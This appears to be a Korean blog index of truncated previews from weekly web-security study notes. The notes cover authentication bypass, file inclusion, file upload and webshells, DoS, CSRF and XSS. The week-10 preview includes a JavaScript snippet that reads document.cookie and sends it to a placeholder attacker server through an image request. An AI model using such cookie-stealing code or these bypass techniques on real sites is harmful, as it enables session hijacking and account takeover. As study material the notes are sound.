본문 바로가기

개념정리

(16)
16주차 인증 / 인가 16주차 인증 / 인가 인증 취약점 (AUTHENTICATION) - 본인이 맞는지 확인하는 작업을 건너뜀 - 인증 프로세스를 건너뛰는 취약점 인증취약점 대표케이스 - COOKIE 변조 -> GET ADMIN - JUMP PROCESS -> PIN CODE BYPASS - MOD RESPONSE -> ADMIN IS MINE - BRUTE FORCE -> PIN CODE CRACK COOKIE를 통해 인증하는 케이스 - 클라이언트 측 정보로 인증 EX) 로그인 유저값을 ADMIN으로 바꿈 PROCESS JUMP - 경로 이동시 인증 필요없음 EX) 인증페이지 다음 경로를 추측해서 다음 경로로 바로 접속한다 MOD RESPONCE - PARAMETER 응답값 변조가능 EX) 로그인 결과값을 받아서 맞는 응..
15주차 FILE INCLUDE / LFI /RFI / FILE DOWNLOAD 15주차 FILE INCLUDE / LFI /RFI / FILE DOWNLOAD FILE INCLUDE 취약점 - LFI (Local File Inclusion) - RFI (Remote File Inclusion) LFI (Local Inclusion Vulenerability) - 공격할 파일을 다른 파일에 끼워넣어 공격할 파일의 확장자와 관계없이 파일을 실행 시킨다. - 서버에 업로드한 파일을 사용하는 파일이 필요하다 - 이 과정에서 FILE UPLOAD 취약점이 사용될 수 도있다 - 파일을 실행시켜 결과를 얻기 때문에 소스코드는 얻을 수 없다. - INCLUDE -> 다른 파일을 특정 파일에서도 실행하고 싶을때 사용하는 명령어 - EX) -> 가져온 파일 명의 확장자와 관계없이 작성한 저 줄에 복..
14주차 SERVER SIDE SCRIPT / FILE UPLOAD / WEBSHELL / 파일 검증 우회 14주차 SERVER SIDE SCRIPT / FILE UPLOAD / WEBSHELL / 파일 검증 우회 FILE UPLOAD 취약점 - 공격자가 원하는 임의의 파일을 업로드 하는 것 -> 업로드 했을때 문제가 발생하는 파일 업로드 - 발생원인 -> 파일업로드시 검증 검사 누락 - 발생위치 -> 파일 업로드 할 수 있는 곳 (버프스윗으로 확인) FILE UPLOAD 공격 종류 - 서버측 실행 파일 업로드 - PHISING -> HTML FILE - DEFACE - XSS - DOS 서버측 실행파일 업로드 - DDOS 공격 , 웹쉘, 악성코드 업로드, 백도어, 악성 프로그램 설치 파일 - 서버에서 실행되는 언어를 업로드 한다 - 공격서버에 대한 언어와 구성정보를 같게 해서 올려야 서버가 해석하니까 서버가..
13주차 DOS / DOS 공격종류 / CSRF 공격 시나리오 / REFERRER DOS / DOS 공격종류 / CSRF 공격 시나리오 / REFERRER DoS (Denial Of Service) - 서비스 거부공격 -> 서버가 서비스를 하지 못하도록 함 - 서비스 -> 웹 서버의 로그인, 회원가입 등등의 서비스 DoS 전략 - 애플리케이션 취약점 - 서버 리소스 소모 - 네크워크 대역폭 소모 - 물리적 테러 애플리케이션 취약점 - 서버 취약점 필요 - 버그 유발 - 아파치 프로그램 종료 - 게시판 -> 타계정 삭제 공격 - 로그인 -> 비번 오류횟수 제한 이용 로그인 하지 못하도록 가용성 침해 서버 리소스 소모 - 서버 취약점 필요 - 게시판 -> 자료 업로드 기능 서버디비를 가득 차게 해서 자료 업로드를 못하게 - CPU 소모 네트워크 대역폭 소모 - 서버에 취약점 없어도 가능!..
12주차 CSRF POST GET / CSRF VS XSS / CSRF WITH CSS / CSRF TOKEN 12주차 CSRF POST GET / CSRF VS XSS / CSRF WITH CSS / CSRF TOKEN CSRF - 클라이언트 측 요청 위조 CSRF VS XSS - CSRF 클라이언트 측 요청위조 서버 응답 -> 피해자 원하지 않는 요청 실행 - XSS 클라이언트측 스크립트 삽입 클라이언트 응답 -> 악성스크립트 실행 - 두개는 별개지만 CSRF가 존재하면 대부분 XSS를 찾을 수 있다. CSRF WITH XSS - 공격 성공률 증가 - GET METHOD/POST METHOD - 포스트 메소드로 응답을 바꾸면 반만 CSRF를 막는것이다 XSS포인트가 완전하게 존재하지 않을때만 사용 가능하다 GET METHOD - 스크립트 작성 - 실행되는 이미지 태그 POST METHOD EX) 아래 버튼을 ..
11주차 XSS대응방안 / EVENT HANDLER / CLIENT SCRIPT 11주차 XSS대응방안 / EVENT HANDLER / CLIENT SCRIPT XSS 대응방안 - HTML ENTITY - FILTERING FILTERING - 블랙리스트 기반 필터링 -> 특정 단어만 제한/ 우회 가능성 존재 - 화이트리스트 기반 필터링 -> 특정 단어만 허용 블랙리스트 기반 필터링 우회 - 길이 제한 EX) -> 스크립트태그에 공격자서버의 악성 스크립트가 작성되어있는 외부 링크를 가져온다 - script 단어 필터링 EX) -> 그대로 값 삽입 뒤로가기 가능 -> 함수표현 뒤로가기 불가능 주소창 변조 - history.pushState(상태, 제목, 링크) - 주소창의 글자일부를 변환 - 도메인은 바꿀 수 없음 - 도메인 이후 의 글자를 로그인 페이지처럼 꾸미거나 글자 길이를 줄일..
10주차 XSS COOKIE / DOM BASED XSS / XSS 대응방법 10주차 XSS COOKIE / DOM BASED XSS / XSS 대응방법 XSS COOKIE - SESSION SESSIONID COOKIE 세션아이디가 쿠키게 저장이되어서 다른계정인척 위조 하여 정보 탈취 할 수 있다. - JAVASCRIPT 의 document.cookie사용 - 해당 도메인의 세션만 탈취 할 수 있음. - XSS 종류는 상관없다. EX) 쿠키탈취 var cookieData = document.cookie; -> var cookieData = document.cookie; //웹 페이지의 쿠키를 가져와서 변수를 설정한다. -> DOCUMENT.COOKIE는 같은 도메인의 쿠키만 가져온다 쿠키 전달 var i = new Image(); i.src ="공격자서버/?cookie=" + ..
9주차 XSS /STORED XSS / CROSSED XSS /보고서 9주차 XSS /STORED XSS / CROSSED XSS XSS - CROSS SITE SCRIPTING - 크사,크스스,크싸 - 클라이언트 측 = 이용자 측 에서 스크립트를 삽입해 실행시키는 것이다 - 즉 피해자는 이용자 - 취약점이 많이나오는 방법 - CSRF XSS는 클라이언트에서 실행되는 공격이므로 공격자 피해자 입장을 동시에 실행하는 것이 중요하다. - 공격에 활용한 XSS인지 생각해보는 것도 중요하다. - JAVASCRIPT를 많이 이용하므로 공부하는 것이 좋다 +JAVASCRIPT 주석 // /* */ CLIENT SCRIPT - 이용자의 브라우저에서 실행되는 것 - 공격자의 악성스크립트가 이용자의 브라우저에서 실행된다 - HTML / CSS / JAVASCRIPT 등 + HTML은 프로..